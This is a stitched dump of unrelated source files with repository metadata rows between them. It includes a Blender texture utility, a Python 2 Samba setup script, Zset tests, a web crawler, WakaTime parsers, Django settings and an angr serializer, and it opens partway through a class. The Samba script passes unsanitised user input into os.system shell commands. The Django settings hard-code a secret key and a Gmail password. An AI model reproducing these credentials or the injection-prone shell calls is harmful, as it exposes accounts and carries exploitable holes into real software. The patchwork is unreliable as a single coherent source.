    ColorMetal = 'cm'
    NormalGloss = 'ng'
    AddMaps = 'add'
    Alphamask = 'alphamask'
# Result of textureFileNameFromPath(): the original path plus its parsed
# lower-cased basename, TextureType (or None) and extension (or None).
TextureFileName = namedtuple('TextureFileName', ('filepath', 'basename', 'textureType', 'extension'))
def _textureTypeFromMatch(match, alt=False) -> TextureType:
    """Map a regex *match* to the TextureType whose named group matched.

    When the pattern contains an 'alt' group, the type is only returned if
    the presence of that group agrees with *alt*; patterns without an 'alt'
    group decide on the type group alone. Returns None for no match.
    """
    if match is None:
        return None
    for textureType in TextureType:
        if not match.group(textureType.value):
            continue
        try:
            altMatched = bool(match.group('alt'))
        except IndexError:
            # pattern has no 'alt' group at all -- the type group decides
            return textureType
        if altMatched == alt:
            return textureType
    return None
def textureTypeFromLabel(label: str, alt=False) -> TextureType:
    """Determine the TextureType encoded in a node label, or None."""
    match = _RE_TEXTURE_LABEL.match(label)
    return _textureTypeFromMatch(match, alt=alt)
def textureTypeFromObjectName(obj, alt=False) -> TextureType:
    """Derive the TextureType from obj.name, falling back to obj.label."""
    fromName = textureTypeFromLabel(obj.name, alt=alt)
    if fromName:
        return fromName
    return textureTypeFromLabel(obj.label, alt=alt)
def imageNodes(nodes, alt=False):
    """
    Extract a map {TextureType -> bpy.types.ShaderNodeTexImage} from *nodes*.
    Only texture-image nodes whose name/label yields a TextureType appear as
    keys. The nodes need not have images; see imagesFromNodes() for that.
    """
    result = {}
    for node in nodes:
        if not isinstance(node, bpy.types.ShaderNodeTexImage):
            continue
        textureType = textureTypeFromObjectName(node, alt=alt)
        if textureType:
            result[textureType] = node
    return result
def imagesFromNodes(nodes, alt=False):
    """
    Extract a map {TextureType -> bpy.types.Image} from *nodes*; texture
    nodes without an image are omitted.
    """
    result = {}
    for textureType, node in imageNodes(nodes, alt=alt).items():
        if node.image:
            result[textureType] = node.image
    return result
def textureFileNameFromPath(filepath: str) -> TextureFileName:
    """
    Decompose the filename of *filepath* into basename, textureType and
    extension. textureType is None when it cannot be determined and
    extension is None when the file has none; basename and extension are
    always lower-cased regardless of the case in *filepath*.
    """
    filename = os.path.basename(filepath)
    match = _RE_TEXTURE_FILENAME.match(filename)
    if match:
        return TextureFileName(
            filepath = filepath,
            basename = match.group('basename').lower(),
            textureType = _textureTypeFromMatch(match),
            extension = match.group('extension').lower(),
        )
    return TextureFileName(filepath, filename.lower(), None, None)
def textureFilesFromPath(dirpath: str, acceptedExtensions={'dds'}) -> dict:
    """
    Scan *dirpath* and build {basename -> {TextureType -> TextureFileName}}.
    Files whose TextureType cannot be determined (or whose extension is not
    accepted) are dropped.
    """
    try:
        names = os.listdir(dirpath)
    except FileNotFoundError:
        return {} # an image.filepath might not actually exist
    parsed = [textureFileNameFromPath(os.path.join(dirpath, name)) for name in names]
    usable = [f for f in parsed if f and f.textureType and f.extension in acceptedExtensions]
    # sort by (basename, path length): groupby needs basename runs, and the
    # ascending length makes the longest (most descriptive) filename win when
    # several files share basename and texture type
    usable.sort(key=lambda f: (f.basename, len(f.filepath)))
    result = {}
    for basename, group in groupby(usable, key=lambda f: f.basename):
        result[basename] = {f.textureType: f for f in group}
    return result
def imageFromFilePath(filepath):
    """
    Provides a bpy.types.Image for the given filepath.
    The function checks if there is an existing Image with such a filepath and loads a new one if there isn't.
    """
    # Normalize to an absolute path so comparisons against already-loaded
    # images are path-format independent.
    filepath = bpy.path.abspath(filepath)
    for image in bpy.data.images:
        if image.filepath and bpy.path.abspath(image.filepath) == filepath:
            return image
    # Prefer a .blend-relative path when loading so the file stays portable.
    try:
        filepath = bpy.path.relpath(filepath)
    except ValueError:
        pass # .blend and image are on different drives, so fall back to using the absolute path
    image = bpy.data.images.load(filepath)
    return image
def matchingFileNamesFromFilePath(filepath):
    """
    Provides a map {TextureType -> TextureFileName} for images that reside in the same directory as
    the file given by filepath and that share the same basename.
    """
    filepath = bpy.path.abspath(filepath)
    textureFileName = textureFileNameFromPath(filepath)
    # NOTE(review): textureFileNameFromPath always returns a TextureFileName,
    # so this guard appears unreachable unless TextureFileName can be falsy.
    if not textureFileName:
        return {}
    allFilesInDir = textureFilesFromPath(os.path.dirname(filepath))
    matchingFiles = allFilesInDir.get(textureFileName.basename, None)
    return matchingFiles if matchingFiles else {}
| gpl-2.0 | 4,081,149,205,319,464,000 | 40.273381 | 126 | 0.677532 | false | 3.68465 | false | false | false |
meigrafd/Sample-Code | sambaserver.py | 1 | 1194 | #!/usr/bin/python
import os
import sys
import crypt
a = raw_input("Enter No. Of user :")
def createuser(useradd1, passwd1):
    """Create a Unix user with an encrypted password and a home directory.

    Fix: the original concatenation fused the flags together (producing e.g.
    '-pXXX-s/bin/bash-d/home/user-m-c ""user'), which is not a valid useradd
    command line; each option now gets its own separating space.

    Returns the exit status of the useradd command (0 on success).
    """
    epass = crypt.crypt(passwd1, "22")
    # NOTE(review): useradd1 comes straight from raw_input and is interpolated
    # into a shell command -- sanitize it (or switch to subprocess with a list
    # argument) before running this on untrusted input.
    return os.system(
        "useradd -p " + epass + " -s /bin/bash -d /home/" + useradd1 + " -m -c \"\" " + useradd1)
def sambaserver(user1):
    """Install Samba and append a public share definition to smb.conf.

    Prompts for the share directory, allowed network and share name, then
    shells out for every step (install, mkdir, SELinux label, config lines,
    smbpasswd, service restart).

    NOTE(review): all prompted values are interpolated into shell commands
    unescaped -- this is vulnerable to shell injection and should use
    subprocess with list arguments in any real deployment.
    """
    f = raw_input ("Enter Directory name:")
    net = raw_input("Enter Network :")
    sb = raw_input("Enter you samba share name :")
    os.system('sudo apt-get install samba samba-common-bin -y')
    os.system("mkdir %s"%f )
    # SELinux: label the directory so smbd may serve it
    os.system("chcon -t samba_share_t %s "%f)
    os.system('echo [%s] >> /etc/samba/smb.conf'%sb)
    os.system('echo comment = public >> /etc/samba/smb.conf')
    os.system('echo path = %s >> /etc/samba/smb.conf'%f)
    os.system('echo public = yes >> /etc/samba/smb.conf')
    os.system('echo browsable = yes >> /etc/samba/smb.conf')
    os.system("echo valid users = %s >> /etc/samba/smb.conf"%user1)
    os.system("echo host allow = %s >> /etc/samba/smb.conf"%net)
    # interactive: smbpasswd prompts for the Samba password itself
    os.system("smbpasswd -a %s"%user1)
    os.system('sudo service samba restart')
# Prompt for and create each requested user, then configure a Samba share.
# Fixes: the original loop header was missing its colon (SyntaxError) and
# passed the raw string from raw_input straight to range() (TypeError).
for x in range(int(a)):
    useradd = raw_input("Enter User name :")
    passwd = raw_input("Enter password :")
    createuser(useradd, passwd)
    sambaserver(useradd)
| mit | 6,200,398,064,977,913,000 | 35.181818 | 112 | 0.656616 | false | 2.732265 | false | false | false |
nooperpudd/pulsar | tests/utils/structures/zset.py | 7 | 2912 | import unittest
from random import randint
from pulsar.utils.structures import Zset
from pulsar.apps.test import populate
class TestZset(unittest.TestCase):
    """Unit tests for pulsar's sorted-set (Zset) data structure: insertion,
    ranking, range queries and the various removal operations."""
    # the class under test; subclasses may override with another implementation
    zset = Zset

    def random(self):
        """Build a zset of 100 random (float score, string value) pairs."""
        string = populate('string', size=100)
        values = populate('float', size=100, min=-10, max=10)
        s = self.zset()
        s.update(zip(values, string))
        return s

    def test_add(self):
        # re-adding an existing value with a new score must not grow the set,
        # and iteration order follows the (updated) scores
        s = self.zset()
        s.add(3, 'ciao')
        s.add(4, 'bla')
        self.assertEqual(len(s), 2)
        s.add(-1, 'bla')
        self.assertEqual(len(s), 2)
        data = list(s)
        self.assertEqual(data, ['bla', 'ciao'])

    def test_rank(self):
        # rank is the 0-based position by ascending score; None when missing
        s = self.zset()
        s.add(3, 'ciao')
        s.add(4, 'bla')
        s.add(2, 'foo')
        s.add(20, 'pippo')
        s.add(-1, 'bla')
        self.assertEqual(len(s), 4)
        self.assertEqual(s.rank('bla'), 0)
        self.assertEqual(s.rank('foo'), 1)
        self.assertEqual(s.rank('ciao'), 2)
        self.assertEqual(s.rank('pippo'), 3)
        self.assertEqual(s.rank('xxxx'), None)

    def test_update(self):
        # items() must yield (score, value) pairs in non-decreasing score order
        s = self.random()
        self.assertTrue(s)
        prev = None
        for score, _ in s.items():
            if prev is not None:
                self.assertTrue(score >= prev)
            prev = score
        return s

    def test_remove(self):
        # removing every value in random order must empty the set
        s = self.test_update()
        values = list(s)
        while values:
            index = randint(0, len(values)-1)
            val = values.pop(index)
            self.assertTrue(val in s)
            self.assertNotEqual(s.remove(val), None)
            self.assertFalse(val in s)
        self.assertFalse(s)

    def test_remove_same_score(self):
        # remove() returns the removed value's score even when scores collide
        s = self.zset([(3, 'bla'), (3, 'foo'), (3, 'pippo')])
        self.assertEqual(s.remove('foo'), 3)
        self.assertEqual(len(s), 2)
        self.assertFalse('foo' in s)

    def test_range(self):
        # range(i, j) must match plain slicing of the iteration order
        # (NOTE: the local name 'all' shadows the builtin)
        s = self.random()
        values = list(s.range(3, 10))
        self.assertTrue(values)
        self.assertEqual(len(values), 7)
        all = list(s)[3:10]
        self.assertEqual(all, values)

    def test_range_scores(self):
        # with scores=True, range yields (score, value) pairs
        s = self.random()
        values = list(s.range(3, 10, True))
        self.assertTrue(values)
        self.assertEqual(len(values), 7)
        all = list(s)[3:10]
        all2 = [v for _, v in values]
        self.assertEqual(all, all2)

    def test_remove_range_by_score(self):
        # removes entries whose score falls within [min, max]; returns count
        s = self.zset([(1.2, 'bla'), (2.3, 'foo'), (3.6, 'pippo')])
        self.assertEqual(s.remove_range_by_score(1.6, 4), 2)
        self.assertEqual(s, self.zset([(1.2, 'bla')]))

    def test_remove_range_by_rank(self):
        # removes entries by rank interval; returns the number removed
        s = self.zset([(1.2, 'bla'), (2.3, 'foo'), (3.6, 'pippo'),
                       (4, 'b'), (5, 'c')])
        self.assertEqual(s.remove_range(1, 4), 3)
        self.assertEqual(s, self.zset([(1.2, 'bla'), (5, 'c')]))
| bsd-3-clause | 6,606,941,366,797,245,000 | 29.652632 | 67 | 0.525755 | false | 3.235556 | true | false | false |
PumpkinPai/lslvimazing-builder | spidey.py | 1 | 4506 | #!/usr/bin/python3
# go to 'targeturl' looking for 'searchterm' and return all of the values within
# 'delim' immediately following the beginning of 'searchterm'
import urllib.request
import os
# Crawl url, look for searchTerm, grab thing within delim, put it in txtFile
def crawl(url, pageBegin, pageEnd, searchTerm, delim, squash, txtFile):
    """Crawl `url`, following MediaWiki-style 'pagefrom=' pagination links.

    Within the region delimited by `pageBegin`/`pageEnd`, every occurrence of
    `searchTerm` is located and the text enclosed between delim[0] and
    delim[1] immediately after it is collected; results are appended, one per
    line, to `txtFile` (which is removed first).

    :param squash: optional iterable of substrings stripped from each page
                   before processing
    :return: (findCount, pageCount) as strings on success, (0, 0) on error
    """
    multi = True
    multiQuery = ''
    # start from an empty results file
    try:
        os.remove(txtFile)
    except OSError:
        pass
    pageCount = 0
    findCount = 0
    try:
        while multi:
            pageCount += 1
            print('Going to: ' + url + multiQuery)
            response = urllib.request.urlopen(url + multiQuery)
            # FIX: decode the payload; the original str(bytes) searched a
            # "b'...'" repr instead of the actual page text under Python 3
            html = response.read().decode('utf-8', errors='replace')
            # PAGEBEGIN TO PAGEEND: keep only the interesting region
            startHtml = html.find(pageBegin)
            endHtml = html.find(pageEnd)
            html = html[startHtml:endHtml]
            # SQUASH: remove problematic tags and strings
            if squash:
                for squish in squash:
                    html = html.replace(squish, '')
            # MULTI: if the category spans multiple pages, remember the link
            # for the next iteration
            multi = html.find('pagefrom=')
            startMulti = html.find('=', multi) + 1
            endMulti = html.find('"', startMulti + 1)
            multiQuery = html[startMulti:endMulti]
            multi = multi > 0
            # PROCESS HTML: collect every delimited value after searchTerm
            foundList = []
            saveFile = open(txtFile, 'a')
            while True:
                startFind = html.find(searchTerm) + len(searchTerm)
                startFound = html.find(delim[0], startFind)
                endFound = html.find(delim[1], startFound + 1)
                found = html[startFound + 1:endFound]
                html = html[endFound:]
                if found:
                    findCount += 1
                    foundList.append(found)
                else:
                    saveFile.write('\n'.join(foundList) + '\n')
                    # FIX: the original said `saveFile.close` (attribute
                    # access, no call) and leaked the file handle
                    saveFile.close()
                    break
        return (str(findCount), str(pageCount))
    except Exception as e:
        print(str(e))
        return (0, 0)
def cleanResults(dirtyFilename, specialRules, replace, ignoreList):
    """Normalize the scraped results stored in `dirtyFilename`, in place.

    Round 1 applies `specialRules` ('caps', 'lower', 'firstLower') to every
    line; round 2 drops duplicates ("replicants") and entries whose
    lower-cased form is in `ignoreList`; round 3 applies the (old, new)
    `replace` pair when replace[0] is non-empty.

    :return: (count, first, last) of the surviving entries, ('0', '', '')
             when nothing survives, or None when the file cannot be read.
    """
    try:
        readFile = open(dirtyFilename, 'r')
    except Exception as e:
        print(str(e))
        return
    resultList = []
    for line in readFile:
        resultList.append(line.strip('\n'))
    # FIX: the original said `readFile.close` (no call) and leaked the handle
    readFile.close()
    # Round 1: apply the special casing rules.
    # NOTE(review): with more than one rule the whole list is appended once
    # per rule (duplicating entries); preserved as-is since round 2 dedupes.
    cleanList = []
    for rule in specialRules:
        for txt in resultList:
            if rule == 'caps':
                txt = txt.upper()
            elif rule == 'lower':
                txt = txt.lower()
            elif rule == 'firstLower':
                txt = txt[0].lower() + txt[1:]
            cleanList.append(txt)
    # Round 2: drop replicants (duplicates) and ignorable entries.
    # FIX: len() guard added -- the bare cleanList[1] raised IndexError when
    # fewer than two entries were read.
    if len(cleanList) > 1 and cleanList[1]:
        resultList = cleanList
    cleanList = []
    for txt in resultList:
        dirty = ''
        if txt in cleanList:
            # duplicate of an already-kept entry
            print(str(cleanList.index(txt)) + ' : ' + txt)
            dirty = ' a replicant'
        if txt.lower() in ignoreList:
            dirty = ' in the ignoreList'
        if dirty == '':
            cleanList.append(txt)
    # Round 3: textual replacements.
    if len(cleanList) > 1 and cleanList[1]:
        resultList = cleanList
        if replace[0]:
            cleanList = []
            for txt in resultList:
                cleanList.append(txt.replace(replace[0], replace[1]))
    if not cleanList:
        # previously this crashed with IndexError on cleanList[0];
        # report an empty result instead (the file is left untouched)
        return ('0', '', '')
    resultTxt = '\n'.join(cleanList) + '\n'
    # FIX: use a context manager; the original never called writeFile.close()
    with open(dirtyFilename, 'w') as writeFile:
        writeFile.write(resultTxt)
    # return number, first and last
    return (str(len(resultList)), cleanList[0], cleanList[-1])
if __name__ == "__main__":
print('The main file is "buildit.py" Run that instead.')
| gpl-2.0 | 4,063,359,969,481,211,000 | 30.075862 | 81 | 0.524634 | false | 4.044883 | false | false | false |
wakatime/komodo-wakatime | components/wakatime/dependencies/__init__.py | 2 | 4336 | # -*- coding: utf-8 -*-
"""
wakatime.dependencies
~~~~~~~~~~~~~~~~~~~~~
Parse dependencies from a source code file.
:copyright: (c) 2014 Alan Hamlett.
:license: BSD, see LICENSE for more details.
"""
import logging
import re
import sys
from ..compat import u, open, import_module
from ..exceptions import NotYetImplemented
log = logging.getLogger('WakaTime')
class TokenParser(object):
    """The base class for all dependency parsers. To add support for your
    language, inherit from this class and implement the :meth:`parse` method
    to return a list of dependency strings.
    """
    # regex strings (compiled per-instance in __init__) matching dependencies
    # that should never be reported
    exclude = []

    def __init__(self, source_file, lexer=None):
        self._tokens = None
        self.dependencies = []
        self.source_file = source_file
        self.lexer = lexer
        # note: shadows the class attribute with the compiled patterns
        self.exclude = [re.compile(x, re.IGNORECASE) for x in self.exclude]

    @property
    def tokens(self):
        # lazily tokenize the source file and memoize the result
        if self._tokens is None:
            self._tokens = self._extract_tokens()
        return self._tokens

    def parse(self, tokens=[]):
        """ Should return a list of dependencies.
        (NOTE: the mutable default `tokens=[]` is never mutated here, but
        subclasses should avoid relying on it.)
        """
        raise NotYetImplemented()

    def append(self, dep, truncate=False, separator=None, truncate_to=None,
               strip_whitespace=True):
        # public helper for subclasses; delegates to _save_dependency
        self._save_dependency(
            dep,
            truncate=truncate,
            truncate_to=truncate_to,
            separator=separator,
            strip_whitespace=strip_whitespace,
        )

    def partial(self, token):
        # last dotted component of a token, e.g. 'a.b.C' -> 'C'
        return u(token).split('.')[-1]

    def _extract_tokens(self):
        # Try UTF-8 first, then the filesystem encoding; reads at most 512 KB.
        # The broad excepts deliberately swallow decode/IO errors so parsing
        # degrades to "no dependencies" instead of crashing the heartbeat.
        if self.lexer:
            try:
                with open(self.source_file, 'r', encoding='utf-8') as fh:
                    return self.lexer.get_tokens_unprocessed(fh.read(512000))
            except:
                pass
            try:
                with open(self.source_file, 'r', encoding=sys.getfilesystemencoding()) as fh:
                    return self.lexer.get_tokens_unprocessed(fh.read(512000)) # pragma: nocover
            except:
                pass
        return []

    def _save_dependency(self, dep, truncate=False, separator=None,
                         truncate_to=None, strip_whitespace=True):
        # Optionally truncate 'a.b.c' to its first `truncate_to` components,
        # then strip, filter against self.exclude and record the dependency.
        # The order matters: truncation happens before whitespace stripping.
        if truncate:
            if separator is None:
                separator = u('.')
            separator = u(separator)
            dep = dep.split(separator)
            if truncate_to is None or truncate_to < 1:
                truncate_to = 1
            if truncate_to > len(dep):
                truncate_to = len(dep)
            dep = dep[0] if len(dep) == 1 else separator.join(dep[:truncate_to])
        if strip_whitespace:
            dep = dep.strip()
        # discard empty results and relative names starting with the separator
        if dep and (not separator or not dep.startswith(separator)):
            should_exclude = False
            for compiled in self.exclude:
                if compiled.search(dep):
                    should_exclude = True
                    break
            if not should_exclude:
                self.dependencies.append(dep)
class DependencyParser(object):
    """Locates and drives the language-specific TokenParser for a file.

    The parser class is discovered by convention: the lexer's module name
    maps to a sibling module in this package, and 'FooLexer' maps to a
    'FooParser' class inside it.
    """
    source_file = None
    lexer = None
    parser = None  # TokenParser subclass, or None when unsupported

    def __init__(self, source_file, lexer):
        self.source_file = source_file
        self.lexer = lexer

        if self.lexer:
            module_name = self.root_lexer.__module__.rsplit('.', 1)[-1]
            class_name = self.root_lexer.__class__.__name__.replace('Lexer', 'Parser', 1)
        else:
            module_name = 'unknown'
            class_name = 'UnknownParser'

        # A missing module or class simply means the language has no
        # dependency support yet; log at debug and leave self.parser as None.
        try:
            module = import_module('.%s' % module_name, package=__package__)
            try:
                self.parser = getattr(module, class_name)
            except AttributeError:
                log.debug('Parsing dependencies not supported for {0}.{1}'.format(module_name, class_name))
        except ImportError:
            log.debug('Parsing dependencies not supported for {0}.{1}'.format(module_name, class_name))

    @property
    def root_lexer(self):
        # delegating lexers (e.g. templates) expose the underlying language
        # lexer via .root_lexer; plain lexers are their own root
        if hasattr(self.lexer, 'root_lexer'):
            return self.lexer.root_lexer
        return self.lexer

    def parse(self):
        """Run the discovered parser; returns a deduplicated list of
        dependency strings, or [] when the language is unsupported."""
        if self.parser:
            plugin = self.parser(self.source_file, lexer=self.lexer)
            dependencies = plugin.parse()
            return list(filter(bool, set(dependencies)))
        return []
| bsd-3-clause | -8,170,313,507,200,091,000 | 31.118519 | 107 | 0.561808 | false | 4.34034 | false | false | false |
virtuald/pygi-composite-templates | examples/from_file/mywidget.py | 2 | 1697 | #!/usr/bin/env python
from __future__ import print_function
# This is only required to make the example with without requiring installation
# - Most of the time, you shouldn't use this hack
import sys
from os.path import join, dirname
sys.path.insert(0, join(dirname(__file__), '..', '..'))
from gi.repository import Gtk
from gi_composites import GtkTemplate
@GtkTemplate(ui='mywidget.ui')
class MyWidget(Gtk.Box):
    """Example composite widget whose layout is loaded from mywidget.ui."""

    # Required else you would need to specify the full module
    # name in mywidget.ui (__main__+MyWidget)
    __gtype_name__ = 'MyWidget'

    # bound to the template child of the same name in the .ui file
    entry = GtkTemplate.Child()

    # Alternative way to specify multiple widgets
    #label1, entry = GtkTemplate.Child.widgets(2)

    def __init__(self, text):
        # NOTE(review): super(Gtk.Box, self) skips MyWidget/Gtk.Box in the
        # MRO; the conventional form would be super(MyWidget, self) -- confirm
        # this is intentional before changing it.
        super(Gtk.Box, self).__init__()

        # This must occur *after* you initialize your base
        self.init_template()

        self.entry.set_text(text)

    @GtkTemplate.Callback
    def button_clicked(self, widget, user_data):
        # 'object' attribute (user-data in glade) is set
        print("The button was clicked with entry text: %s" % self.entry.get_text())
        print("The user-data is %s" % user_data)

    @GtkTemplate.Callback
    def entry_changed(self, widget):
        # 'object' attribute (user-data in glade) is not set
        print("The entry text changed: %s" % self.entry.get_text())

    @GtkTemplate.Callback
    def on_MyWidget_destroy(self, widget):
        print("MyWidget destroyed")
if __name__ == '__main__':
    # Demo entry point: show the composite widget in a bare window and run
    # the GTK main loop until the window is closed.
    win = Gtk.Window()
    win.connect('delete-event', Gtk.main_quit)
    widget = MyWidget("The entry text!")
    win.add(widget)
    win.show_all()
    Gtk.main()
javiligorria/ies-bolivar | JEM/settings.py | 1 | 5808 | # Django settings for JEM project.
import os.path
RUTA_PROYECTO = os.path.dirname(os.path.realpath(__file__))
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', '[email protected]'),
)
MANAGERS = ADMINS
# NOTE(review): with the sqlite3 backend, NAME should normally be a file
# path (e.g. os.path.join(RUTA_PROYECTO, 'jemdb')); a bare name creates the
# database file relative to the process working directory.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
        'NAME': 'jemdb',                      # Or path to database file if using sqlite3.
        'USER': '',                      # Not used with sqlite3.
        'PASSWORD': '',                  # Not used with sqlite3.
        'HOST': '',                      # Set to empty string for localhost. Not used with sqlite3.
        'PORT': '',                      # Set to empty string for default. Not used with sqlite3.
    }
}
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'es'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = os.path.join(RUTA_PROYECTO,'media')
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = '/media/'
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT =''
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
os.path.join(RUTA_PROYECTO,'static'),
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
# SECURITY WARNING(review): this key is committed to source control; any real
# deployment should generate a fresh key and load it from the environment.
SECRET_KEY = '1b-8=7hxf8!o+%+1y%*os2ytx3!*esoumr#i34vtdvjli2rnyr'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'JEM.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'JEM.wsgi.application'
TEMPLATE_DIRS = (
os.path.join(RUTA_PROYECTO,'templates'),
#'C:/Users/javiligorria/Desktop/JEM/JEM/templates',
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Uncomment the next line to enable the admin:
'django.contrib.admin',
'principal',
# Uncomment the next line to enable admin documentation:
'django.contrib.admindocs',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
# Settings for sending mail through Gmail's SMTP server (TLS on port 587).
# SECURITY WARNING(review): real credentials are hard-coded here; move them
# to environment variables and rotate this password before deploying.
EMAIL_USE_TLS =True
EMAIL_HOST = 'smtp.gmail.com'
EMAIL_HOST_USER = '[email protected]'
EMAIL_HOST_PASSWORD = '28344308'
EMAIL_PORT = 587
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
| gpl-3.0 | -5,361,671,234,065,746,000 | 33.152941 | 108 | 0.68722 | false | 3.592822 | false | false | false |
angr/angr | angr/angrdb/serializers/loader.py | 1 | 2125 |
from io import BytesIO
from typing import List
import cle
from ...errors import AngrCorruptDBError
from ..models import DbObject
class LoaderSerializer:
    """
    Serialize/unserialize a CLE Loader object into/from an angr DB.
    """

    # reverse map: CLE backend class -> registered backend name
    backend2name = {v: k for k, v in cle.ALL_BACKENDS.items()}

    @staticmethod
    def dump(session, loader):
        """Persist every on-disk object of *loader* into the DB session.

        Dynamically created objects (externs, TLS, kernel) are skipped, as
        are objects whose path is already present in the database.
        """
        for obj in loader.all_objects:
            if isinstance(obj, (cle.ExternObject,
                                cle.backends.tls.elf_tls.ELFTLSObject,
                                cle.KernelObject,)):
                # skip dynamically created objects
                continue

            # does the object exist?
            exists = session.query(DbObject.id).filter_by(path=obj.binary).scalar() is not None
            if exists:
                # it exists. skip.
                continue

            # FIXME: We assume the binary and its libraries all still exist on the disk

            # read the binary content with a context manager so the file
            # handle is closed deterministically (the original leaked it)
            with open(obj.binary, "rb") as f:
                content = f.read()

            # save the object
            o = DbObject(
                main_object=loader.main_object is obj,
                path=obj.binary,
                content=content,
                backend=LoaderSerializer.backend2name.get(obj.__class__),
                backend_args="",  # TODO: We will need support from CLE to store loader arguments
            )
            session.add(o)

    @staticmethod
    def load(session):
        """Rebuild a cle.Loader from the objects stored in the DB session.

        :raises AngrCorruptDBError: when no object is flagged as the main one.
        """
        all_objects = {}  # path to object
        main_object = None

        db_objects = session.query(DbObject)  # type: List[DbObject]

        for db_o in db_objects:
            all_objects[db_o.path] = db_o
            if db_o.main_object:
                main_object = db_o

        if main_object is None:
            raise AngrCorruptDBError("Corrupt database: No main object.")

        # build params
        # FIXME: Load other objects
        loader = cle.Loader(
            BytesIO(main_object.content),
        )
        # fix the binary name of the main binary
        loader._main_binary_path = main_object.path
        loader.main_object.binary = main_object.path
        return loader
| bsd-2-clause | 7,931,450,695,782,348,000 | 28.109589 | 97 | 0.562824 | false | 4.319106 | false | false | false |
mcgill-robotics/Firmware | Tools/sdlog2/geo_tag_images.py | 2 | 14291 | #!/usr/bin/env python
#
# Tag the images recorded during a flight with geo location extracted from
# a PX4 binary log file.
#
# This file accepts *.jpg format images and reads position information
# from a *.px4log file
#
# Example Syntax:
# python geo_tag_images.py --logfile=log001.px4log --input=images/ --output=imagesWithTag/ --offset=-0.4 -v
#
# Optional: Correct image times first
# jhead -exonly -ft -n%Y-%m-%d\ %H.%M.%S -ta+HH:MM:SS *.JPG
#
# Author: Hector Azpurua [email protected]
# Based on the script of Andreas Bircher
import os
import re
import sys
import bisect
import pyexiv2
import argparse
from lxml import etree
import datetime
import calendar
from shutil import copyfile
from subprocess import check_output
from pykml.factory import KML_ElementMaker as KML
from pykml.factory import GX_ElementMaker as GX
class GpsPosition(object):
    """A single GPS fix: a timestamp plus latitude/longitude/altitude.

    lat/lon/alt are coerced to float; the timestamp is stored unchanged.
    """

    def __init__(self, timestamp, lat, lon, alt):
        self.timestamp = timestamp
        for name, value in (('lat', lat), ('lon', lon), ('alt', alt)):
            setattr(self, name, float(value))
class Main:
    def __init__(self):
        """Parse CLI arguments, load GPS fixes and image paths, then run the
        whole tagging pipeline (and optional KML generation) immediately.
        """
        args = self.get_arg()

        self.logfile = args['logfile']
        self.input = args['input']
        self.output = args['output']
        self.kml = args['kml']
        self.verbose = args['verbose']
        self.offset = args['offset']          # GPS/local clock offset, ms
        self.time_thresh = args['threshold']  # max image/GPS gap, seconds

        self.tdiff_list = []            # per-image time differences (s)
        self.non_processed_files = []   # images with no GPS fix close enough
        self.tagged_gps = []            # GPS fixes actually used

        print '[INFO] Loading logs and images locations...'

        self.gps_list = self.load_gps_from_log(self.logfile, self.offset)
        self.img_list = self.load_image_list(self.input)

        if len(self.img_list) <= 0:
            print '[ERROR] Cannot load JPG images from input folder, please check filename extensions.'
            sys.exit(1)

        if not os.path.exists(self.output):
            os.makedirs(self.output)

        # normalize so filenames can be appended directly
        if not self.output.endswith(os.path.sep):
            self.output += os.path.sep

